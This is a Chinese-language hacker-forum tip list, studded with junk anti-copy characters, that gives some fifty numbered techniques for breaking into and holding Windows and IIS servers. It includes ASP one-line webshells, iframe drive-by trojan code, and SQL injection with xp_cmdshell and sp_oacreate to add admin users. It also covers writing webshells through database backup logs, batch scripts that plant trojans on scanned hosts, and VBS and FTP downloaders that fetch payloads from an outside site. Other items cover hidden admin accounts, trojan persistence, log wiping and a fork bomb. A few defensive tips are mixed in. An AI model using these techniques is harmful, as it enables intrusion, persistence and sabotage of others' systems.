1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
4 c0 s [& f3 q! `cacls C:\windows\system32 /G hqw20:R
+ ?+ g2 ^/ r ]7 |思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入; O4 I" Z! m. N: \. K; M
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F4 w- ~& P2 Z2 c0 {" f: S+ o
/ \# k- l+ [7 C8 h, @. Z* m2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
9 a f0 a5 D& T! Y! d7 d) w2 Q |0 P t" F z$ x
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
! |$ ?. }# r; i1 ^! N5 O8 d) Z4 I ^) R* l3 }; l
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
# i) y7 U; J1 z7 z Q% a- i* a; g3 B, W
5、利用INF文件来修改注册表
& [! n% s7 _* e0 G# @; N3 I s" L[Version]% X/ {- s, l* k
Signature="$CHICAGO$"" [6 X) f4 {: b' z
[Defaultinstall]9 @* B$ J2 N: Q" B
addREG=Ating, P, K' T6 X1 h/ M, \2 Q
[Ating]
- W2 P* k, H0 L( [- J( t m9 N$ KHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
: }1 P; j7 T4 l以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
$ O2 a* y# |3 \" L2 m) I8 Xrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径) h h( F) c% B _
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU/ l: a4 V6 q0 a" E. e
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% Q# e3 a5 B" b3 QHKEY_CURRENT_CONFIG 简写为 HKCC
! ~, C7 X. {3 y" w; h7 ]0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 X) S- k- Q: i! I"1"这里代表是写入或删除注册表键值中的具体数据
) I* `8 |4 ]( h* w/ S/ y! Q) @( ~: ^
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 O4 R* c8 A& o7 W多了一步就是在防火墙里添加个端口,然后导出其键值0 D: Q3 E) O4 B6 `' s
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
( {2 @6 ~$ g0 t+ |$ k
( u) Q* v$ f% z) R- G5 O# B7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽7 h' ^2 E0 X& x6 N
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
) j+ ?+ w: k8 W( X& e, H/ _
6 m& b: j' O( s0 V) ?8 q6 K8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
' s+ ~" ^8 Y" L7 t, z3 y4 i6 Y
$ r+ B0 B' Z1 D$ O9 \9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
1 u6 U$ C' u$ P. g7 c2 D/ v- w可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。2 x) O# x; _7 Y% X3 Y! t) @- B
7 K. y g- F5 l% N; I. y2 ~4 s2 R
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
l* {! w6 p$ A P, W! H6 }; ?) n* h+ o
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 P5 e5 w! M2 R& J! S; B用法:xsniff –pass –hide –log pass.txt' g& T8 P7 x2 j% A7 t
; k" A+ S+ w$ T3 v12、google搜索的艺术$ a1 Z* B6 u/ N0 M
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
: ?5 s2 u2 s7 t4 g4 o或“字符串的语法错误”可以找到很多sql注入漏洞。2 W3 e/ w+ l, z6 R) ^ a6 c3 E0 q
$ @. k* z) }6 x j13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。' r; N- g. n: G" H+ @" N2 C5 O
+ f0 D/ A3 h$ Z' N* u$ O! u
14、cmd中输入 nc –vv –l –p 1987
. J( u5 \# ^/ }4 `1 B& Z$ E做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
" t/ f) K0 _" v# r
7 Q# m8 H- X I15、制作T++木马,先写个ating.hta文件,内容为
* W+ a; v. U' v& ^* ?" @) {<script language="VBScript">
z2 e$ ]- n' h/ m6 q" t& ?( Nset wshshell=createobject ("wscript.shell" )
2 e# d" y: B+ A8 T9 Ta=wshshell.run("你马的名称",1)& w. W, P" ^' N8 M5 b
window.close% J% u7 J; R! w n" j' l* V. Z
</script>* c" w4 g) q3 C( |) [! T. M
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。2 y/ k0 A: M. y1 R# q* g$ O& m4 C
/ D* {+ [' j$ z' Z) Q( { S9 m; C, W3 e
16、搜索栏里输入
& V1 x* V! K5 r' O关键字%'and 1=1 and '%'='
9 Y) j8 p! {, e2 x7 r0 z关键字%'and 1=2 and '%'='
- A1 n0 {' |& ]0 [4 t比较不同处 可以作为注入的特征字符
# M5 i; S. n1 g) s- _# W' P
* Y4 _+ i7 T, K5 X5 H/ j6 r+ o17、挂马代码<html>
0 N& H; F* t, W2 x6 N# C+ z8 S<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
" ~' D1 E0 [ b' M: `</html>+ ~4 b, N3 S5 e
( h n/ u" u$ P* ^18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆, ?; l+ {; s h) x8 A" W. D
net localgroup administrators还是可以看出Guest是管理员来。* f/ u' I) t6 s" Y8 p
; p4 j5 N& V! l1 V, S3 I
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等1 q. \ [; S# ?! C: v" i0 C
用法: 安装: instsrv.exe 服务名称 路径/ b' v# V# _# }8 h( a l/ P
卸载: instsrv.exe 服务名称 REMOVE
+ V$ W( k* x) s" i" K K. z
3 h& @) i( ~' R8 a1 b6 |: Q' z5 o. v5 \% K2 _
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉8 d9 x6 U& ~ R; K) d. U$ J
不能注入时要第一时间想到%5c暴库。0 m$ p' ?; @! \- ~" t3 x
/ C( Y' r3 u+ S5 A+ t5 I4 E22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
6 v9 u" t/ U5 Q/ N0 d5 Q: b7 L" y, @4 [; M3 ^4 `: M m Y6 X3 v: B
23、缺少xp_cmdshell时
5 M' o$ @5 e* _# ~' f t" B尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 z. t4 i. j! T; o
假如恢复不成功,可以尝试直接加用户(针对开3389的)
7 T, ]1 j2 Z& ]. K# t# g8 y8 Odeclare @o int+ B- [7 x0 a8 x8 \
exec sp_oacreate 'wscript.shell',@o out
6 R% @: ]6 K4 W4 l! Zexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员 X. n9 i% {7 g( R
& g+ {% _. D0 v* J" [0 P/ T" `24.批量种植木马.bat. b3 ^ V3 Q7 n- S0 Y
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
3 {3 g% P s% n& }$ N7 Sfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
" K2 t: J1 A3 [0 R2 k( K扫描地址.txt里每个主机名一行 用\\开头: g, A' l, u' H: t/ @
8 ~) }( b m1 k" l0 w8 F
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。/ M2 L3 K( @7 @% ]7 o
& Q2 G* ]% z- M3 `( f, E4 ]( S; O6 `
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名. d! Z+ L) x H' S" E- S( U% {$ x
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
. Q4 ^( V1 a( U# s2 \! o( Q.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
' K u' ^$ B3 ]3 C0 P; F
, P5 n0 k: q# b8 R; O27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP! t+ j% l8 U+ _, a; {7 e- p
然后用#clear logg和#clear line vty *删除日志5 X2 f1 `" w1 Y, i8 V
" ?7 K6 K- N# u& k' E
28、电脑坏了省去重新安装系统的方法
1 o3 U6 L/ ?5 V6 V+ Y纯dos下执行,
- D" N% Y& R# U Txp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
) a9 i1 j! q" T+ ? [1 F2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config0 Z, k* r' K, J7 f3 L E% `3 m# q0 n
$ y+ m- y8 g: G1 t1 `7 @1 |29、解决TCP/IP筛选 在注册表里有三处,分别是:7 p8 Y1 g" m- t- j
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip) h ~+ Q2 H7 M% x. ?& C& P
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' k& \* C W' C( g/ UHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, p( o5 F5 A% M; t* K+ O/ ?
分别用4 O, o* p D) z
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 l( _. s5 `4 Mregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ G$ n- {1 N7 xregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: E, U% _; j9 v1 J l命令来导出注册表项" i# B `8 T2 j/ t
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
w4 K" k: |: m9 Q( _+ a9 c改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用/ p! |4 m2 C, ~+ b+ p* g, W/ l
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
d7 i7 P8 a) q7 R) z8 c# e5 v" s1 S$ G! Z# r t. M! v
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 J9 a" ]4 g* `& B) C0 |
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3; A8 a8 z9 V! O/ E9 V1 Q1 d
5 i8 }! |$ g) S/ A h31、全手工打造开3389工具
% @& Q3 Q2 v0 Z6 c打开记事本,编辑内容如下:7 }) s' I( g0 e/ G& L
echo [Components] > c:\sql- n0 u% p3 m% }1 E% N L
echo TSEnable = on >> c:\sql
) M: v# i9 F( g! d# W8 Isysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' h4 n; S' Y0 B5 }8 s, C
编辑好后存为BAT文件,上传至肉鸡,执行
; B5 X% i2 y6 q4 d6 A& R9 d4 D. m( k( l4 H
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
* Q+ @0 L, Z* E) p0 n
) b, q, o5 C* m' H2 R33、让服务器重启. ?/ |! x1 V1 U5 {& ]
写个bat死循环:+ a0 o* O6 R! b+ x
@echo off/ r! p' ^& R+ o5 H: i3 o) @ L
:loop1
6 w% l7 \2 }4 \: T. ?cls/ H- B& C7 `8 I& I4 ~% |0 ]
start cmd.exe" _; P t& r( `/ d
goto loop1
* j7 Q/ c; u0 U保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启6 S6 v; e0 N8 A1 B% m
X) ]% C2 K4 K, J }: {' M) y
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,# |2 U: v- y* Z$ Y5 u" c. ~' e e
@echo off
- z7 S' H' ]3 T' L) Edate /t >c:/3389.txt2 V. V' M( `) S' j2 K
time /t >>c:/3389.txt
! t8 s4 `- \9 Xattrib +s +h c:/3389.bat! |& I; o2 y7 ~6 h9 a. J, ^0 f
attrib +s +h c:/3389.txt# D, j2 A! [% k# X( O
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
4 }% N0 {& o+ ]" ` K7 \并保存为3389.bat
$ r2 H: W" [0 U, s2 O. ^6 o打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号5 [. W% ]2 d$ x7 H7 q& c \
; e4 D. b. f& f; x5 h6 S3 t
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
7 n; o9 ]/ ^9 t5 H; s$ Y* z; ~7 m) [start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页): s Y5 s9 f( P8 }' t! n
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
; d5 ? X. X) X6 m/ u2 ? [0 s
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
( f, @6 F, D; v1 J; }/ cecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址8 s! x9 h9 Q0 r5 }$ D8 h7 f) }
echo 你的FTP账号 >>c:\1.bat //输入账号
- M' z+ n8 u5 X! `+ D, @echo 你的FTP密码 >>c:\1.bat //输入密码: H+ N9 Y, I$ S. w( @2 o! j
echo bin >>c:\1.bat //登入* [0 T! T5 F8 B. x2 R3 h5 s4 `6 q
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么" x7 {9 |$ F; C z& L7 m
echo bye >>c:\1.bat //退出- z+ O! R& ?. ], o# `/ a; v! E
然后执行ftp -s:c:\1.bat即可
. a9 t" m) k8 {( v5 }( O
* A8 u* |/ F0 e( L$ p, H37、修改注册表开3389两法
: F: m2 J h w(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
. p9 u( a5 b5 Jecho Windows Registry Editor Version 5.00 >>3389.reg
% e% c& b# q3 ?" m( l) recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
2 G2 X* e; W" Iecho "Enabled"="0" >>3389.reg
% J l' Z+ U; U& y; O2 V3 l% Wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
B$ @- Z+ S- D" uNT\CurrentVersion\Winlogon] >>3389.reg
+ M- ?, o! ^) P. i1 Z9 O) Jecho "ShutdownWithoutLogon"="0" >>3389.reg! j e3 Y1 q, z& B1 y, z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
0 S, `) C- `% u" R$ C>>3389.reg5 w; G9 ]; {) J' k' v$ F
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg1 a! s1 c0 h y2 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
" M6 m# c& o3 `- ?3 ?>>3389.reg
- c! H' D3 T' m6 ^echo "TSEnabled"=dword:00000001 >>3389.reg% j1 |9 V' j: t& G' }7 e, }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg I% m! [( \3 ~
echo "Start"=dword:00000002 >>3389.reg5 l) O# w( q! s+ w6 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]2 w5 y2 `9 x7 J7 [
>>3389.reg
* f% v1 l, D# z- _2 v I# M. e# Cecho "Start"=dword:00000002 >>3389.reg1 s6 m& H$ X4 l( s
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ y5 V- X5 M* `9 c( A' H
echo "Hotkey"="1" >>3389.reg
/ v# \0 l+ e' Q. Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 b% E: C$ J' f% N
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
0 a, y) S- y. F# M! |7 E. Iecho "PortNumber"=dword:00000D3D >>3389.reg
& y: |4 \; t" r4 f4 L0 S/ q5 M/ d* iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. _; g6 R# S5 h
Server\WinStations\RDP-Tcp] >>3389.reg
& E" _5 k$ ^! Gecho "PortNumber"=dword:00000D3D >>3389.reg
0 w W) S6 T6 Z# Q7 x! g! Y" i7 D把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。% |& G0 z- c) p; `* n9 P
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了): d) z: s3 y3 E( f7 N" V5 a
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效0 i( D4 o8 ]0 i- V. y( B: P( R$ J3 P
(2)winxp和win2003终端开启
/ n5 A9 F0 }7 k3 j用以下ECHO代码写一个REG文件:- L9 |- R2 N: j! b2 ]! ]
echo Windows Registry Editor Version 5.00>>3389.reg6 S& d' b: m& M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ b1 s5 s n2 |+ f+ S9 s6 N" QServer]>>3389.reg
" [( {" u6 o6 A/ Qecho "fDenyTSConnections"=dword:00000000>>3389.reg
( R" E* M- z7 f3 E. j; Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 X9 b$ a( \6 a7 TServer\Wds\rdpwd\Tds\tcp]>>3389.reg
- B+ Q1 H* E7 ?0 x5 xecho "PortNumber"=dword:00000d3d>>3389.reg$ s& p0 \3 h" N: ]% W9 I4 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal y5 G3 @; r, W1 ~+ d8 G, Q
Server\WinStations\RDP-Tcp]>>3389.reg* J2 k; |% q2 P( d( z: L7 M
echo "PortNumber"=dword:00000d3d>>3389.reg
& q; N* \- o" E4 |& n3 \/ M3 r1 l然后regedit /s 3389.reg del 3389.reg" t! Q2 ~/ O4 E/ T8 z
XP下不论开终端还是改终端端口都不需重启! q; m6 k1 \. G# K
& g! B' d$ f7 x0 H
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃6 _3 B, a2 L1 Z8 C/ Y! P* Z
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'! s- n. |8 {( M" f# ~
8 Y% a3 W5 y; e- p5 f0 E7 P- z: p; L
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
9 V! @1 P0 N: Z+ p# |( N7 j0 N- U(1)数据库文件名应复杂并要有特殊字符4 }1 j4 Y/ v+ @1 Y4 c# G
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
" y3 t/ J [3 l3 ~; B1 @! Q将conn.asp文档中的
. G3 o }/ _! r% A6 eDBPath = Server.MapPath("数据库.mdb")" |6 m- r. n! Y9 j% h, Y
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
# n9 I1 ?6 Z* \) b& Q A
5 f, ?, z5 A: K# L) i修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置' G4 F7 J9 q5 I- L2 l
(3)不放在WEB目录里
8 U: ]) v K; P2 k) Y- E L' i+ i2 g) ?
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉: V$ w: H8 ^* o1 q; j* K! \
可以写两个bat文件0 b0 R4 P' }" D# v, x" c( n
@echo off
% d9 w' ]9 q6 B@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
X6 ^% f6 y' ~- `6 {( g, V* ~@del c:\winnt\system32\query.exe
- y: f# b( R+ T5 ]- @; |@del %SYSTEMROOT%\system32\dllcache\query.exe
3 l4 k& o% t0 v* E, @@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的+ G h. B. P! r
7 k: u1 O' |+ F. B@echo off
0 f% g& S* v4 O" i7 m% z8 }, e@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe/ J! s% v% H7 L; e6 ` k9 |! Y
@del c:\winnt\system32\tsadmin.exe
( Y! |' e+ G/ e/ V7 N$ ?5 R@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
! U. h5 o8 U8 F1 ?% [
3 y) p; ^1 K+ k: i, }3 `' p41、映射对方盘符
' c' V6 j* a9 x$ ntelnet到他的机器上,
3 J% D$ v7 H- E: mnet share 查看有没有默认共享 如果没有,那么就接着运行
: R+ y1 z4 y) j$ y8 P' C7 h' D* h7 |net share c$=c:. v9 _4 ^# t4 [ E
net share现在有c$
0 T Y' I$ B1 n$ l1 G在自己的机器上运行
& Q) g; W5 f1 jnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K/ T* k C2 x+ @
" ]' v B) y1 u0 m7 E42、一些很有用的老知识) \7 q2 B. ^" v/ \/ Z$ L! ?
type c:\boot.ini ( 查看系统版本 )9 G- H( v! O; B% `0 j
net start (查看已经启动的服务)
# T& E5 A' q- z' L' Fquery user ( 查看当前终端连接 )% u. Y- C5 s( ^% t* g' s Y2 n$ E: m
net user ( 查看当前用户 )3 ^1 F( K8 x! y0 y! x6 x
net user 用户 密码/add ( 建立账号 )+ Y! y. N6 h3 F# z/ X s& a3 g
net localgroup administrators 用户 /add (提升某用户为管理员)+ s' c0 ~+ t! x
ipconfig -all ( 查看IP什么的 )
& k& ]# D! |( _8 v7 G# p8 |6 Fnetstat -an ( 查看当前网络状态 )
' ?( W8 Z9 \- Z* ffindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)' y. |7 f6 y# \9 r
克隆时Administrator对应1F4- w) ^3 k8 n* t3 _% r" X
guest对应1F5' u a0 z2 U5 [. B/ @: d, H
tsinternetuser对应3E8 d+ @4 t. g7 A& H
5 i+ I* t2 o3 W" |& L% u( J7 I43、如果对方没开3389,但是装了Remote Administrator Service/ R+ Y8 x& ?# g
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接1 l: k( w: W e
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
/ \! [, G) _* ~# m h8 G) c先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin": x" @& s0 q0 {7 I5 t/ R8 `) }' X6 \& }
+ s- D# |$ X! m3 c0 ]/ w% u
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)" ^8 v* R( B3 g% ~3 D+ ^" R d
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)1 W/ R ?6 v }; r9 t* N
! n) X5 G/ U% n I' f$ a
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
7 j. L( S* o) |6 p z5 c7 l, h* Jecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open) Z7 {: o; r8 C! e" s
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =- J, b5 I" ]' q& o. u8 k9 S+ Q. w$ N
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =+ [$ a0 e2 g& D& t+ H- u* g2 m
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs& z. c3 X4 u% g: p' O% n8 L
(这是完整的一句话,其中没有换行符)1 w8 i3 {3 H" U, K
然后下载:7 q0 Z4 f- F" G! Y, W: ]" l
cscript down.vbs http://www.hack520.org/hack.exe hack.exe& o5 E! x( r3 }0 `
( `6 f4 k& @5 S; V0 L7 X) E$ [9 M+ s
46、一句话木马成功依赖于两个条件:
2 ?# j1 Z9 @5 s9 _1、服务端没有禁止adodb.Stream或FSO组件' o* x: |/ h. x8 K* a/ R C) U, I
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。' [% O$ c) S) a5 Z" R/ _
1 e9 c( x" B. k5 ^47、利用DB_OWNER权限进行手工备份一句话木马的代码:/ w2 n0 ~, _. _, T* E7 M% R
;alter database utsz set RECOVERY FULL--
. u* M$ Q& P' N5 O3 a;create table cmd (a image)--# S$ V# U* ~& B. t( v, v
;backup log utsz to disk = 'D:\cmd' with init--; L7 R6 x! G: k1 m2 H
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--2 s0 V5 ~: M8 t# s2 X9 V
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--- }/ e7 b5 o- r% m! S
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
4 \2 {- g& \3 s. P M# p5 J
! W. J) D' L# n/ Y8 A* I) Y9 H, b8 g48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
! w5 N+ T/ J" ~
v0 b" \: P( c0 W4 M$ [用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options3 a- W8 `5 R9 S' u5 q
所有会话用 'all'。% I4 J9 a0 f& x! `
-s sessionid 列出会话的信息。
9 h; |" D/ c, c7 {; F-k sessionid 终止会话。
3 ?. @3 G9 @% H2 S- K-m sessionid 发送消息到会话。
0 L9 P! L7 x9 @* b
/ C( Q2 ^9 i. M# m7 `5 dconfig 配置 telnet 服务器参数。
5 Y, u3 A; Y; K+ U0 i; s0 B" B+ Z5 ?" \
common_options 为:" M) P8 p6 a& O; y' p" B2 n
-u user 指定要使用其凭据的用户/ a: ~7 p# t# t8 J
-p password 用户密码& ^. h( K* V& \' Y% l
9 h0 o, A* p1 Y) f( r/ ?
config_options 为:
! \! G, @- W6 Q0 H% e2 n7 b: F9 Odom = domain 设定用户的默认域
7 b: Z6 d. Y4 r/ l3 `8 nctrlakeymap = yes|no 设定 ALT 键的映射' w6 t2 F0 ~, \
timeout = hh:mm:ss 设定空闲会话超时值
, P; S# H4 |. ~. {timeoutactive = yes|no 启用空闲会话。
1 c0 ]! @2 s/ H6 Nmaxfail = attempts 设定断开前失败的登录企图数。' h! X; y1 n1 D( m3 I% {# p
maxconn = connections 设定最大连接数。; U! L3 G- C0 {
port = number 设定 telnet 端口。, [) J1 t7 ^) N7 i9 U5 \& L
sec = [+/-]NTLM [+/-]passwd- ]: C' `' [9 _8 e% O) H: H$ |
设定身份验证机构
( g/ _7 b+ u, p7 ?: C/ _fname = file 指定审计文件名。
. d' B& L: j/ ]+ vfsize = size 指定审计文件的最大尺寸(MB)。- X" M4 R! g3 D: ^
mode = console|stream 指定操作模式。. H6 T E" l7 I/ N. p5 }
auditlocation = eventlog|file|both$ c/ V# z- |$ d( ^% W0 T
指定记录地点
" q' ~* ~+ `7 f" c( ?: |audit = [+/-]user [+/-]fail [+/-]admin+ l: V8 s7 U/ x7 H @8 g! _6 @& G
! B# `' `9 a8 s3 j
49、例如:在IE上访问:
% Q6 O0 o# d$ b& C Owww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
5 X5 P9 P% [( Fhack.txt里面的代码是:) |2 W- l6 f5 q0 j; f x d
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">1 o$ x! Q6 X. h( e
把这个hack.txt发到你空间就可以了!
f1 }: U5 |4 k! h3 {1 x这个可以利用来做网马哦!
1 [. n9 E y+ H- o/ u3 K. H9 I+ z+ i
! `+ u4 z/ L' N/ H" B3 U- h50、autorun的病毒可以通过手动限制!+ s- o2 U5 Z2 S: j& t5 q
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!+ D! N8 m, L7 q6 W. U' t5 D3 I
2,打开盘符用右键打开!切忌双击盘符~; t ]5 l o0 Q% C& g% i v# K
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!* l$ g& d9 m" ?
) Y: ^2 l8 t- u$ J! R! V4 @" A7 |
51、log备份时的一句话木马:0 C3 z5 D5 R# q
a).<%%25Execute(request("go"))%%25>. ^: ^2 m3 S1 `" Q1 n) `, e! N# M' @
b).<%Execute(request("go"))%>" W) |9 N" N: G3 a6 h; o
c).%><%execute request("go")%><%' m2 D5 e0 G9 F _) D
d).<script language=VBScript runat=server>execute request("sb")</Script>6 l5 \/ P1 s* Q' a( B% K
e).<%25Execute(request("l"))%25>
: C3 d- F$ D! o6 W* k' Rf).<%if request("cmd")<>"" then execute request("pass")%>
* F, ^! r* ~' e5 `' k
4 c$ \* A$ p3 ?" v+ w4 ^5 h! `3 }52、at "12:17" /interactive cmd
$ h7 K& u. ?- \8 m! v9 K执行后可以用AT命令查看新加的任务
